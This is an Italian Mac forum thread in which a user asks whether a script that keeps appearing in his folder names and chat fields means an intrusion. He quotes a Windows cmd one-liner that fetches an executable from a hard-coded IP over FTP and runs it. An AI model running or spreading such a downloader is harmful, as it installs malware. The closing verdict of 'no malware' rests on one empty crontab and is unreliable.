Forum Mac Peer

Mac Peer Forum. Forum dedicato al Mac e alle sue applicazioni. Ipad, iPhone e iPod
https://www.tuttologia.com/mac-forum/

Intrusione ?

https://www.tuttologia.com/mac-forum/viewtopic.php?t=46567

Page 1 of 1

Intrusione ?

Posted: Thu May 20, 2010 10:16 pm
by esteban14
Ciao a tutti,
è il mio primo msg, quindi chiedo venia se sbaglio qualcosa.
Ho un Macbook Pro in cui gira Tiger, da qualche giorno, io lo vedo alla sera quando ci smanetto, ad un certo punto da solo parte questo script:

cmd /c echo open 65.113.3.92 21 >> ik &echo user st_joe bw >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &x.exe &exit
cmd /c close

Se sto cliccando su una cartella, mi rinomina la cartello con il testo dello script, se sono in rete e sto ad esempio chattando, mi scrive lo script nel campo del testo.

Secondo voi è un'intrusione?

Ciao e grazie
Esteban

Posted: Thu May 20, 2010 10:23 pm
by Peterpan
Forse dovresti spiegare meglio. Effettivamente e' uno script che lancia un ftp e preleva un file eseguibile per windows.

Cosa fai quando parte ? Riesci a ricordare da quanto tempo fa questo e se puo' essere legato a qualche installazione o operazione particolare che hai fatto ?

Per verificare comunque perche' parte: apri il terminale e digita:

sudo crontab -l (inserisci la password)

e poi posta qui il risultato.

Posted: Thu May 20, 2010 10:34 pm
by esteban14
Quando parte lo script mi parte la sudorazione :) , non faccio nulla, scrive il testo dove capita e si ferma.
Forse è iniziato dopo che ho aggiornato il programma per il TomTom.
Comunque seguo le tue indicazione e riporto il risultato.
Scusa la domanda da profano:
la password è quella utente? Nel caso io non abbia creato nessun utente lascio in bianco?

Grazie mille

Stefano

Posted: Thu May 20, 2010 10:37 pm
by Peterpan
La password e' quella dell'utente con privilegi di amministratore.

Posted: Sun May 23, 2010 11:26 am
by esteban14
Peterpan wrote:La password e' quella dell'utente con privilegi di amministratore.
Io non ho mai impostato nessuna password, come devo fare per avere privilegi da amministratore?

Posted: Sun May 23, 2010 11:40 am
by Votantonio
Io credo che tu i privilegi di amministratore li abbia comunque se sei l'unico proprietario e amministratore del computer.
Una password di login comunque ci vuole, la puoi reimpostare da Preferenze di Sistema/Account/.

Posted: Mon May 24, 2010 9:47 am
by esteban14
Ecco il risultato, sempre che abbia fatto le cose a modo:

Last login: Mon May 24 08:50:42 on console
Welcome to Darwin!
computer-di-utente:~ utente$ sudo crontab -l
Password:
crontab: no crontab for root
computer-di-utente:~ utente$

Posted: Mon May 24, 2010 9:50 am
by Votantonio
Allora puoi stare tranquillo, non hai malware nel tuo Mac.
Resta da capire che diavolo sia quello script e perchè si comporta così.
All times are UTC-11:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited